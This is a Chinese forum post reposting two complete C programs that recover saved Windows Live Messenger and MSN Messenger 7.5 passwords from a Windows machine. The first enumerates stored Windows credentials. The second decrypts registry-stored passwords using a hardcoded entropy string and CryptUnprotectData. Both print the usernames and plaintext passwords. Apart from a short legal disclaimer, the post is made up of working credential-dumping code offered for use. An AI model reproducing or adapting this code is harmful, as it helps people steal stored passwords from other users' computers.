HanDs
管理员

[Visual Studio文章] MSN密码拦截VC源码 



**
** Windows Live Messenger v8.0 Password Finder for Windows XP & 2003
** (Compiled-VC++ 6.0 SP6, tested on WinXP SP2, Windows Live Messenger
8.0.0812.00)
** - Gregory R. Panakkal
** http://www.crapware.tk/
** http://www.infogreg.com/
**/

#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <stdio.h>
#include <tchar.h>

//Following definitions taken from wincred.h
//[available only in Oct 2002 MS Platform SDK / LCC-Win32 Includes]

typedef struct _CREDENTIAL_ATTRIBUTEA {
LPSTR Keyword;
DWORD Flags;
DWORD ValueSize;
LPBYTE Value;
}
CREDENTIAL_ATTRIBUTEA,*PCREDENTIAL_ATTRIBUTEA;

typedef struct _CREDENTIALA {
DWORD Flags;
DWORD Type;
LPSTR TargetName;
LPSTR Comment;
FILETIME LastWritten;
DWORD CredentialBlobSize;
LPBYTE CredentialBlob;
DWORD Persist;
DWORD AttributeCount;
PCREDENTIAL_ATTRIBUTEA Attributes;
LPSTR TargetAlias;
LPSTR UserName;
} CREDENTIALA,*PCREDENTIALA;

typedef CREDENTIALA CREDENTIAL;
typedef PCREDENTIALA PCREDENTIAL;


////////////////////////////////////////////////////////////////////

typedef BOOL (WINAPI *typeCredEnumerate)(LPCTSTR, DWORD, DWORD *,
PCREDENTIAL **);
typedef VOID (WINAPI *typeCredFree)(PVOID);

typeCredEnumerate pfCredEnumerate = NULL;
typeCredFree pfCredFree = NULL;

////////////////////////////////////////////////////////////////////

void showBanner()
{
_tprintf(_T("Windows Live Messenger Password Finder for Windows XP &
2003\n"));
_tprintf(_T(" - Gregory R. Panakkal, http://www.infogreg.com
\n\n"));
}

////////////////////////////////////////////////////////////////////
int main()
{
PCREDENTIAL *CredentialCollection = NULL;
HMODULE hAdvapi32DLL = NULL;
DWORD dwCount = 0;
DWORD dwTempIndex = 0;
BOOL bOK = FALSE;

showBanner();

do
{
     
      hAdvapi32DLL = LoadLibrary(_T("advapi32.dll"));

      if(NULL == hAdvapi32DLL)
      {
          _tprintf(_T("Error loading advapi32.dll\n"));
          break;
      }


#ifdef _UNICODE
      pfCredEnumerate =
      (typeCredEnumerate)GetProcAddress(hAdvapi32DLL,
      "CredEnumerateW");
#else
      pfCredEnumerate =
      (typeCredEnumerate)GetProcAddress(hAdvapi32DLL,
      "CredEnumerateA");
#endif

      pfCredFree = (typeCredFree)GetProcAddress(hAdvapi32DLL,
      "CredFree");


      if( pfCredEnumerate == NULL||
          pfCredFree == NULL )
      {
          _tprintf(_T("Error loading Cred APIs\n"));
          break;
      }

      //Get an array of 'credential', satisfying the filter
      bOK = pfCredEnumerate(
                  _T("WindowsLive:name=*"),
                  0,
                  &dwCount,
                  &CredentialCollection
                  );


      if(FALSE == bOK)
      {
          _tprintf(_T("Error enumerating credentials\n"));
          break;
      }

      for(dwTempIndex=0; dwTempIndex<dwCount; dwTempIndex++)
      {

          _tprintf(
              _T("Username : %s\n"),
              CredentialCollection[dwTempIndex]->UserName
              );
         
          _tprintf(
              _T("Password : %s\n\n"),
              CredentialCollection[dwTempIndex]->CredentialBlob
              );
      }

      //Free credential collection
      pfCredFree(CredentialCollection);


} while(false);


//Free lib
if(NULL != hAdvapi32DLL)
{
      FreeLibrary(hAdvapi32DLL);
}

return TRUE;
}

/*
* MSN Messenger v7.5 Password Decrypter Source Code for Windows XP & 2003
* (Compiled - VC++ 2005, Tested on WinXP SP2, MSN Messenger v7.5.0324)
*      - Gregory R. Panakkal
*        http://www.infogreg.com/
*/

#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>
#include <WinCred.h>
#include <tchar.h>

#pragma comment(lib, "Crypt32.lib")

void showBanner()
{
_tprintf(_T("MSN Messenger v7.5 Password Decrypter for Windows XP/2003\n"));
_tprintf(_T(" - Gregory R. Panakkal, http://www.infogreg.com \n\n"));
}

////////////////////////////////////////////////////////////////////
int main()
{
PCREDENTIAL* CredentialCollection = NULL;
DATA_BLOB blobCrypt;
DATA_BLOB blobPlainText;
DATA_BLOB blobEntropy;
DATA_BLOB blobDynEntropy;
HKEY hKeyDynSalt = NULL;
HKEY hKeyCreds = NULL;
HKEY hKeyUserCred = NULL;
DWORD dwRet = 0;
DWORD dwType = 0;
DWORD dwDataSize = 0;
DWORD dwTemp = 0;
PBYTE pDynamicSalt = NULL;
PBYTE pEncPassword = NULL;
TCHAR szMsgrUserName[MAX_PATH];
DWORD dwCount = 0;
REGSAM RegSAM = KEY_READ;
WCHAR szEntropy[] = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";

ZeroMemory(&blobCrypt, sizeof(blobCrypt) );
ZeroMemory(&blobPlainText, sizeof(blobPlainText) );
ZeroMemory(&blobEntropy, sizeof(blobEntropy) );
ZeroMemory(&blobDynEntropy, sizeof(blobDynEntropy) );

showBanner();   

do
{
      //
      // Allocate some memory!
      //
      pEncPassword = (PBYTE)malloc( MAX_PATH );

      if(NULL == pEncPassword)
      {
          _tprintf(_T("ERROR: malloc failed!"));
          break;
      }


      //
      // Fetch & Calculate Dynamic Salt
      //
      dwRet = RegOpenKeyEx(
                  HKEY_CURRENT_USER,
                  _T("SOFTWARE\\MICROSOFT\\IdentityCRL\\Dynamic Salt"),
                  0,
                  RegSAM,
                  &hKeyDynSalt
                  );

      if(ERROR_SUCCESS != dwRet)
      {
          _tprintf(_T("ERROR: Cannot opening dynamic salt reg key!"));
          break;
      }

      dwTemp = sizeof(dwDataSize);

      dwRet = RegQueryValueEx(
                  hKeyDynSalt,
                  _T("Size"),
                  NULL,
                  &dwType,
                  (LPBYTE)&dwDataSize,
                  &dwTemp
                  );

      if( ERROR_SUCCESS != dwRet ||
          REG_DWORD != dwType ||
          sizeof(DWORD) != dwTemp )
      {
          _tprintf(_T("ERROR: Cannot fetch dynamic salt data size!"));
          break;
      }

      pDynamicSalt = (PBYTE)malloc( dwDataSize );

      if(NULL == pDynamicSalt)
      {
          _tprintf(_T("ERROR: malloc failed!"));
          break;
      }

      dwTemp = dwDataSize;

      dwRet = RegQueryValueEx(
                  hKeyDynSalt,
                  _T("Value"),
                  NULL,
                  &dwType,
                  (LPBYTE)pDynamicSalt,
                  &dwTemp);


      if( ERROR_SUCCESS != dwRet ||
          REG_BINARY != dwType ||
          dwDataSize != dwTemp )
      {
          _tprintf(_T("ERROR: Cannot fetch dynamic salt data!"));
          break;
      }

      //Initial Crypt Blob
      blobCrypt.pbData = (LPBYTE)pDynamicSalt;
      blobCrypt.cbData = dwDataSize;


      //Initialize Entropy Blob
      blobEntropy.pbData = (LPBYTE)&szEntropy;
      blobEntropy.cbData = 0x40;

      if(FALSE == CryptUnprotectData(
                          &blobCrypt,
                          NULL,
                          &blobEntropy,
                          NULL,
                          NULL,
                          1,
                          &blobPlainText
                      ))
      {
          //something
          break;
      }

      //
      // Construct the 128 Char long Entropy value
      //

      memcpy(
          blobCrypt.pbData,
          blobEntropy.pbData, blobEntropy.cbData
          );

      memcpy(
          blobCrypt.pbData + blobEntropy.cbData,
          blobPlainText.pbData,
          blobPlainText.cbData
          );

      blobEntropy.cbData += blobPlainText.cbData;
      blobEntropy.pbData = blobCrypt.pbData;


      //Free memory & Zero-off Blob structure
      LocalFree(blobPlainText.pbData);
      ZeroMemory(&blobPlainText, sizeof(blobPlainText));


      //
      // Enumerate all the stored credentials in the registry
      //

      dwRet = RegOpenKeyEx(
                  HKEY_CURRENT_USER,
                  _T("SOFTWARE\\MICROSOFT\\IdentityCRL\\Creds"),
                  0,
                  RegSAM,
                  &hKeyCreds
                  );

      if(ERROR_SUCCESS != dwRet)
      {
          _tprintf(_T("ERROR: Cannot opening credential key!"));
          break;
      }

      while( true )
      {
          dwRet = RegEnumKey(
                      hKeyCreds,
                      dwCount,
                      (LPTSTR)&szMsgrUserName,
                      MAX_PATH
                      );

          if( ERROR_SUCCESS != dwRet )
          {
              break;
          }

          dwRet = RegOpenKeyEx(
                      hKeyCreds,
                      szMsgrUserName,
                      0,
                      RegSAM,
                      &hKeyUserCred
                      );

          if(ERROR_SUCCESS == dwRet)
          {
              dwTemp = MAX_PATH;


              //
              // Read encrypted passsword
              //

              dwRet = RegQueryValueEx(
                          hKeyUserCred,
                          _T("ps:password"),
                          NULL,
                          &dwType,
                          (LPBYTE)pEncPassword,
                          &dwTemp);

              if( ERROR_SUCCESS == dwRet &&
                  REG_BINARY == dwType )
              {
                  blobCrypt.pbData = (LPBYTE)pEncPassword;
                  blobCrypt.cbData = dwTemp;

                  //
                  // Decrypt & Display Credential Info!
                  //
                  if(TRUE == CryptUnprotectData(
                                      &blobCrypt,
                                      NULL,
                                      &blobEntropy,
                                      NULL,
                                      NULL,
                                      1,
                                      &blobPlainText
                                  ))
                  {
                      _tprintf(
                          _T("Username : %s\nPassword : %ws\n\n"),
                          szMsgrUserName,
                          blobPlainText.pbData
                          );

                      LocalFree(blobPlainText.pbData);
                  }
              }

              //Close User Cred Key
              RegCloseKey(hKeyUserCred);
              hKeyUserCred = NULL;
          }

          dwCount++;
      }

}while(false);


if(NULL != pDynamicSalt)
{
      free(pDynamicSalt);
}

if(NULL != pEncPassword)
{
      free(pEncPassword);
}

if(NULL != hKeyCreds)
{
      RegCloseKey(hKeyCreds);
}

if(NULL != hKeyDynSalt)
{
      RegCloseKey(hKeyDynSalt);
}


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
MSN 密码拦截 VC 源码
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复